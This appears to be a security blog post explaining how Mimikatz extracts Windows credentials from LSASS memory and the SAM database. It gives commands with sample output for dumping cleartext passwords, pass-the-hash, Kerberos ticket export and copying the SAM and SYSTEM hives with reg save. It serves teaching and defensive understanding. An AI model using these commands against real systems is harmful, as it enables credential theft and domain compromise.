creds_all

Wednesday, November 13, 2019

This is a phat tool and a one page description of it isnt really possible. However, what I am going to try to do is discuss what Mimikatz is as a whole, and its common usecases. So, with that said, heres a one page description.

As gentilkiwi puts it, Mimikatz1 is a tool he wrote to learn C. But, its secondary function is to be the most common used tool to extract credentials from Windows Processes.

To do all this, Mimikatz has adopted a modular design and has several available2:

In this post, I’m going to focus on lsadump and sekurlsa as these are probably the two most commonly used modules.

sekurlsa

First off, sekurlsa. This module is arguably the most used within Mimikatz. it works by reading data from the SamSs service, which is known as the LSASS process.

C:\Users\mez0>tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
lsass.exe                      664 Services                   0     17,608 K

sekurlsa has a several, modules. Here is the list (shamelessly lifted from adsecurity):

  • SEKURLSA::Ekeys - list Kerberos encryption keys
  • SEKURLSA::Kerberos - List Kerberos credentials for all authenticated users (including services and computer account)
  • SEKURLSA::Krbtgt - get Domain Kerberos service account (KRBTGT)password data
  • SEKURLSA::LogonPasswords - lists all available provider credentials. This usually shows recently logged on user and computer credentials.
  • SEKURLSA::Pth - Pass- theHash and Over-Pass-the-Hash
  • SEKURLSA::Tickets - Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users).

In this post, I’ll specifically be focusing on LogonPasswords and Tickets.

Before jumping into how, why and what sekurlsa extracts from. A quick primer on LSASS.

Local Security Authority

In typical Microsoft fashion, the MSDN is not clear. However, to my understanding, lsass.exe is the process name for LSA Authentication.

Local Security Authority (LSA) Authentication describes the part of the LSA that is responsible for authenticating users to the local system3.

To get into the inner-workings of LSA, the following visual is required:

LSA Model

NOTE: Windows internals are, for me, hard to find resources for. So, the description I’ve found 4 is for XP and below. If alot has changed, then send me the updated information on Twitter.

With that said, there are two primary ways of logging into Windows machine.

  • Local User
  • Domain User

In both of these instances, those credentials pass through the LSA client and its server.

LSA will then determine who it needs to talk to in order to determine if the credentials supplied are valid. That’s where the negotiate block comes in.

This will then do one of two things:

  • If the system is configured as a workstation, use the NTLM scheme as configured on the machine and communicate with the SAM database.
  • If the system is configured as part of a domain, talk to the server to see what it supports.

It makes sense that lsass.exe would be a targeted process.

Its also worth mentioning that LSA is modular. It works alongside wdigest, kerberos and so on. All of these are Security Support Providers. Or, just DLLs, really. They all do something very specific related to their function. But, it is possible to extract data from most of them.

This could go into a very long post if all the SSPs are discussed.

How the extraction works

Using wdigest as an example, whenlogonPasswords is ran, Mimikatz reads memory from lsass to grab a decryption key which is embedded and used to protect wdigest, alongside other memory-stored credentials.

Mimikatz can extract from lsass without first creating a memory dump, by default using the ReadProcessMemory API. If you’re really set on dumping memory, or can'‘t (for whatever read) load Mimikatz on the machine at the time, Mimikatz can read credentials from dumped memory. procdump (for example) can create a memory dump of lsass, and once you’re home safe and sound you can use sekurlsa::minidump within Mimikatz to extract data. This process is the same as sekurlsa::logoPasswords; it just reads from the dump as though it’s reading directly from lsass.

Mimikatz has functionality to read memory and scrape credentials that are cached by each aforementioned modules. So, when someone says they are dumping creds from lsass, they are really scraping memory for cached hashes/credentials and keys.

xpn wrote a really good article exploring the inner-workings of wdigest.

Extracting

Credentials

Command:

sekurlsa::logonpasswords

Output:

Authentication Id : 0 ; 88038 (00000000:000157e6)
Session           : Interactive from 1
User Name         : Mez0
Domain            : domain
SID               : S-1-5-21-2044528444-627255920-3055224092-1000
        msv :
         [00000003] Primary
         * Username : Mez0
         * Domain   : domain
         * LM       : 
         * NTLM     : 
         * SHA1     : 
        tspkg :
         * Username : Mez0
         * Domain   : domain
         * Password : Password1
        wdigest :
         * Username : Mez0
         * Domain   : domain
         * Password : Password1
        kerberos :
         * Username : Mez0
         * Domain   : domain
         * Password : Password1
        ssp :
         [00000000]
         * Username : admin
         * Domain   : domain2
         * Password : Password2
        credman :
         [00000000]
         * Username : domain2\admin
         * Domain   : domain2.domain.local
         * Password : Password2

Pass-the-hash

Command:

mimikatz # sekurlsa::pth /user:Administrator /domain:domain.local

Output:

 /ntlm:cc36cf7a8514893efccd332446158b1a
user    : Administrator
domain  : domain.local
program : cmd.exe
NTLM    : cc36cf7a8514893efccd332446158b1a
  |  PID  712
  |  TID  300
  |  LUID 0 ; 362544 (00000000:00058830)
  \_ msv1_0   - data copy @ 000F8AF4 : OK !
  \_ kerberos - data copy @ 000E23B8
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ des_cbc_md5       -> null
   \_ des_cbc_crc       -> null
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace -> null

Tickets

Command:

mimikatz # sekurlsa::tickets /export

Output:

Authentication Id : 0 ; 541043 (00000000:00084173)
Session           : Interactive from 2
User Name         : Administrator
Domain            : domain
SID               : S-1-5-21-130452501-2365100805-3685010670-500

* Username : Administrator
* Domain   : domain.LOCAL
* Password : (null)

Group 0 - Ticket Granting Service
[00000000]
 Start/End/MaxRenew: 11/05/2014 16:47:59 ; 12/05/2014 02:47:58 ; 18/05/2014 16:47:58
 Service Name (02) : ldap ; srv1.domain.local ; @ domain.LOCAL
 Target Name  (02) : ldap ; srv1.domain.local ; @ domain.LOCAL
 Client Name  (01) : Administrator ; @ domain.LOCAL
 Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
 Session Key       : 0x00000012 - aes256_hmac      
   d0195b657e63cdec73f32bf44d36bb12a62c928de6db9964b5a87c55721f8d04
 Ticket            : 0x00000012 - aes256_hmac       ; kvno = 5  [...]
 * Saved to file [0;84173]-0-0-40a50000-Administrator@ldap-srv1.domain.local.kirbi !
[00000001]
 Start/End/MaxRenew: 11/05/2014 16:47:59 ; 12/05/2014 02:47:58 ; 18/05/2014 16:47:58
 Service Name (02) : LDAP ; srv1.domain.local ; domain.local ; @ domain.LOCAL
 Target Name  (02) : LDAP ; srv1.domain.local ; domain.local ; @ domain.LOCAL
 Client Name  (01) : Administrator ; @ domain.LOCAL ( domain.LOCAL )
 Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
 Session Key       : 0x00000012 - aes256_hmac      
   60cedabb5c3e2874131e9770c2d858fdec0342acf8c8787771d7c4475ace0392
 Ticket            : 0x00000012 - aes256_hmac       ; kvno = 5  [...]
 * Saved to file [0;84173]-0-1-40a50000-Administrator@LDAP-srv1.domain.local.kirbi !

Group 1 - Client Ticket ?

Group 2 - Ticket Granting Ticket
[00000000]
 Start/End/MaxRenew: 11/05/2014 16:47:58 ; 12/05/2014 02:47:58 ; 18/05/2014 16:47:58
 Service Name (02) : krbtgt ; domain.LOCAL ; @ domain.LOCAL
 Target Name  (02) : krbtgt ; domain.LOCAL ; @ domain.LOCAL
 Client Name  (01) : Administrator ; @ domain.LOCAL ( domain.LOCAL )
 Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; 
 Session Key       : 0x00000012 - aes256_hmac      
   4b42cce01deffbfb0e67efc18c993bb52601848763aecf322030329cd1882e4c
 Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2  [...]
 * Saved to file [0;84173]-2-0-40e10000-Administrator@krbtgt-domain.LOCAL.kirbi !

lsadump

The second Mimikatz module I want to take a loot at is lsadump. lsadump extracts the Security Account Managers (SAM) database. The SAM Database contains NTLM and LM hashes of users passwords.

It has two modes:

  1. online (with SYSTEM user or token)
  2. Offline (with SYSTEM & SAM hives or backup)

Online

lsadump::sam works by getting the SysKey, a component of Windows that encrypts the SAM database using 128-bit RC4 Encryption, to decrypt the SAM entries from the registry or hive. The SAM option connects to the local SAM database and extracted credentials for local accounts. [^ 8]

It is worth noting that to achieve this, it must be done as SYSTEM. This can be done by getting an impersonated SYSTEM token with:

mimikatz # token::elevate

To check that the privilege is correct, then this command can be run:

mimikatz # privilege::debug

Extracting data with lsadump::sam

Command:

mimikatz # lsadump::sam

Output:

Domain : domain
SysKey : 74c159e4408119a0ba39a7872e9d9a56

SAMKey : e44dd440fd77ebfe800edf60c11d4abd

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

RID  : 000001f5 (501)
User : user.name
LM   :
NTLM :

RID  : 000003e8 (1000)
User : Mez0
LM   :
NTLM : cc36cf7a8514893efccd332446158b1a

Offline

This is a lot easier. Its done by copying the hives:

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save

Or, by using Volume Shadow Copy:

C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SAM

Once the files are safe and sound, then can be dumped like this:

Command:

mimikatz # lsadump::sam /system:system.save /sam:sam.save

Output:

Domain : domain
SysKey : 74c159e4408119a0ba39a7872e9d9a56

SAMKey : e44dd440fd77ebfe800edf60c11d4abd

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

RID  : 000001f5 (501)
User : user.name
LM   :
NTLM :

RID  : 000003e8 (1000)
User : Mez0
LM   :
NTLM : cc36cf7a8514893efccd332446158b1a

An honourable mention here is the lsadump::lsa command. This can be used to specifically extract hashes based on the RID value:

Command:

mimikatz # lsadump::lsa /id:500

Output:

Domain : domain / S-1-5-21-130452501-2365100805-3685010670

RID  : 000001f4 (500)
User : Administrator
ERROR kuhl_m_lsadump_lsa_user ; SamQueryInformationUser c0000003

Conclusion

Well, with that said. That must be less than 10% of the tools and techniques for extracting credentials from Windows. The tl;dr is that gentilkiwi had a pretty big impact whilst learning a tool and if you search command: in this post, that will get you to all the commands.

References


  1. github.com/gentilkiwi/mimikatz ↩︎

  2. Mimikatz Wiki ↩︎

  3. LSA Authentication ↩︎

  4. How does LSA authentication on Windows work? ↩︎

WindowsMimikatzPost-Exploitation

#TIFG: NT (New Technology) LAN Manager

Linky: Scraping LinkedIn